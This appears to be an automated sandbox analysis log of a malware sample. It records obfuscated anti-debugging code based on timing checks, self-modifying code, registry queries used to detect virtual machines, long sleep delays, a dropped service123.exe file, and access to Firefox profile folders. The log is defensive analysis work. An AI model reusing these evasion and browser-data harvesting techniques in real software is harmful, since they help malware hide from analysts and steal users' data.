Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0BD0 second address: 7AB0C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1A3A461A3Ch 0x0000000f pushad 0x00000010 mov bl, cl 0x00000012 mov si, di 0x00000015 popad 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 jmp 00007F19CD112F6Bh 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 pushad 0x00000022 jmp 00007F19CD112F74h 0x00000027 mov dl, ah 0x00000029 popad 0x0000002a lea eax, dword ptr [ebx+78h] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F19CD112F73h 0x00000034 jmp 00007F19CD112F73h 0x00000039 popfd 0x0000003a jmp 00007F19CD112F78h 0x0000003f popad 0x00000040 push 00000001h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pop edi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0C6F second address: 7AB0C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0C73 second address: 7AB0D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F19CD112F76h 0x0000000c sbb ecx, 725EC638h 0x00000012 jmp 00007F19CD112F6Bh 0x00000017 popfd 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F19CD112F76h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F19CD112F71h 0x00000027 sbb eax, 2638CF86h 0x0000002d jmp 00007F19CD112F71h 0x00000032 popfd 0x00000033 mov ecx, 0E0AE937h 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007F19CD112F6Ah 0x0000003f lea eax, dword ptr [ebp-08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F19CD112F6Ah 0x0000004b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0D08 second address: 7AB0D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0D0C second address: 7AB0D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0DB5 second address: 7AB0E86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 97ABh 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e jmp 00007F19CCBA87BEh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 pushad 0x00000017 push ebx 0x00000018 pushfd 0x00000019 jmp 00007F19CCBA87C8h 0x0000001e xor si, 5398h 0x00000023 jmp 00007F19CCBA87BBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b lea eax, dword ptr [ebx+70h] 0x0000002e jmp 00007F19CCBA87BFh 0x00000033 push 00000001h 0x00000035 jmp 00007F19CCBA87C6h 0x0000003a nop 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F19CCBA87BEh 0x00000042 sub ecx, 34795858h 0x00000048 jmp 00007F19CCBA87BBh 0x0000004d popfd 0x0000004e mov si, D90Fh 0x00000052 popad 0x00000053 push eax 0x00000054 jmp 00007F19CCBA87C5h 0x00000059 nop 0x0000005a pushad 0x0000005b mov bx, si 0x0000005e popad 0x0000005f lea eax, dword ptr [ebp-18h] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F19CCBA87C1h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0E86 second address: 7AB0E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0E8C second address: 7AB0E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0E90 second address: 7AB0EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19CD112F70h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0EBE second address: 7AB0ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0ECD second address: 7AB0EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0EDE second address: 7AB0EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F60 second address: 7AB0F89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1A3A461698h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F89 second address: 7AB0F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F8D second address: 7AB0F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F93 second address: 7AB0F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F99 second address: 7AB0F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0F9D second address: 7AB100A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b jmp 00007F19CCBA87C8h 0x00000010 mov ecx, esi 0x00000012 jmp 00007F19CCBA87C0h 0x00000017 mov dword ptr [esi+0Ch], eax 0x0000001a jmp 00007F19CCBA87C0h 0x0000001f mov edx, 74E806ECh 0x00000024 jmp 00007F19CCBA87C0h 0x00000029 sub eax, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F19CCBA87BCh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB100A second address: 7AB101C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB101C second address: 7AB1034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F19CCBA87BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1034 second address: 7AB103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB103A second address: 7AB103E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB103E second address: 7AB1042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1042 second address: 7AB1134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F19CCBA87C9h 0x0000000e test eax, eax 0x00000010 jmp 00007F19CCBA87BEh 0x00000015 jne 00007F1A39EF6E1Eh 0x0000001b pushad 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F19CCBA87BCh 0x00000023 adc cx, A3F8h 0x00000028 jmp 00007F19CCBA87BBh 0x0000002d popfd 0x0000002e movzx ecx, bx 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F19CCBA87C5h 0x00000038 xor ax, D896h 0x0000003d jmp 00007F19CCBA87C1h 0x00000042 popfd 0x00000043 popad 0x00000044 mov edx, dword ptr [ebp+08h] 0x00000047 pushad 0x00000048 call 00007F19CCBA87BCh 0x0000004d pop edi 0x0000004e mov cl, 6Ah 0x00000050 popad 0x00000051 mov eax, dword ptr [esi] 0x00000053 jmp 00007F19CCBA87C9h 0x00000058 mov dword ptr [edx], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d pushfd 0x0000005e jmp 00007F19CCBA87C3h 0x00000063 sbb ah, FFFFFFDEh 0x00000066 jmp 00007F19CCBA87C9h 0x0000006b popfd 0x0000006c push esi 0x0000006d pop edi 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1134 second address: 7AB1150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1150 second address: 7AB1154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1154 second address: 7AB1165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1165 second address: 7AB1169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1169 second address: 7AB116D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB116D second address: 7AB1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1173 second address: 7AB11A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007F19CD112F76h 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB11A4 second address: 7AB11AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB11AA second address: 7AB1232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F19CD112F6Eh 0x00000013 add ecx, 2BCCCE28h 0x00000019 jmp 00007F19CD112F6Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F19CD112F78h 0x00000025 sbb al, FFFFFF88h 0x00000028 jmp 00007F19CD112F6Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+0Ch] 0x00000032 jmp 00007F19CD112F76h 0x00000037 mov dword ptr [edx+0Ch], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1232 second address: 7AB1236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1236 second address: 7AB123A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB123A second address: 7AB1240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1240 second address: 7AB1246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1246 second address: 7AB12D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F19CCBA87BCh 0x00000016 or eax, 43D74078h 0x0000001c jmp 00007F19CCBA87BBh 0x00000021 popfd 0x00000022 jmp 00007F19CCBA87C8h 0x00000027 popad 0x00000028 call 00007F19CCBA87C2h 0x0000002d call 00007F19CCBA87C2h 0x00000032 pop esi 0x00000033 pop ebx 0x00000034 popad 0x00000035 mov dword ptr [edx+10h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F19CCBA87BDh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12D0 second address: 7AB12D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12D6 second address: 7AB12DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB12DA second address: 7AB1330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b jmp 00007F19CD112F6Fh 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 pushad 0x00000014 mov dx, cx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F19CD112F6Eh 0x0000001e jmp 00007F19CD112F75h 0x00000023 popfd 0x00000024 movzx esi, di 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+18h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edi, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1330 second address: 7AB1335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1335 second address: 7AB1343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB144B second address: 7AB1467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, ch 0x00000006 popad 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a mov ecx, dword ptr [esi+2Ch] 0x0000000d pushad 0x0000000e mov di, 50BEh 0x00000012 popad 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1467 second address: 7AB146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB146D second address: 7AB148F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB148F second address: 7AB1493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1493 second address: 7AB14B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14B0 second address: 7AB14B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14B6 second address: 7AB14BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14BA second address: 7AB14BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB14BE second address: 7AB1513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F19CCBA87BFh 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F19CCBA87BBh 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F19CCBA87C9h 0x00000024 jmp 00007F19CCBA87BBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1513 second address: 7AB153C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F19CD112F78h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB153C second address: 7AB154E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB154E second address: 7AB155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB155F second address: 7AB1565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB1565 second address: 7AB156B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB156B second address: 7AB156F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 141FAF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 141D6BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Special instruction interceptor: First address: 165A5CC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 1892 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 1890 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 999 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 985 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window / User API: threadDelayed 984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6569 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3430 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 2076 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 2076 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5740 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5740 Thread sleep time: -84042s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5720 Thread sleep count: 1892 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5720 Thread sleep time: -3785892s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5264 Thread sleep count: 1890 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 5264 Thread sleep time: -3781890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 4312 Thread sleep count: 999 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 4312 Thread sleep time: -1998999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1436 Thread sleep count: 985 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1436 Thread sleep time: -1970985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1076 Thread sleep count: 984 > 30 Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe TID: 1076 Thread sleep time: -1968984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep count: 6569 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep time: -656900s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep count: 3430 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4336 Thread sleep time: -343000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
